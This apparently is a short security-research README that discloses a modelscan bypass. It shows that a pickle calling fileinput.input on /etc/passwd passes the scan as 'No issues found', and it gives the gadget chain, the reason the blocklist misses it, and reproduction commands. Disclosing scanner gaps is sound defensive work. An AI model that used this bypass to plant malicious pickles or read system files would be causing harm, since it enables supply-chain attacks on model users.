metadata
license: mit
tags:
- security-research
- modelscan-bypass
- pickle-safety
modelscan-bypass-fileinput
Modelscan Bypass PoC — fileinput.input
Severity: MEDIUM Impact: Arbitrary file read — fileinput.input(files) reads any file accessible to the process modelscan version: 0.7.6 (latest on PyPI) Result: "No issues found!" ✅ (false negative)
Chain
fileinput.input(["/etc/passwd"]) → reads sensitive files
Why It Works
fileinput.input is NOT in modelscan's unsafe_globals blocklist.
fileinput is NOT in the blocklist.
Reproduction
pip install modelscan
modelscan scan -p bypass_poc.pkl
# Output: "No issues found!"
python3 -c "import pickle; pickle.loads(open('bypass_poc.pkl','rb').read())"
# Executes arbitrary code
Responsible Disclosure
This PoC is part of a responsible disclosure to ProtectAI via Huntr MFV program.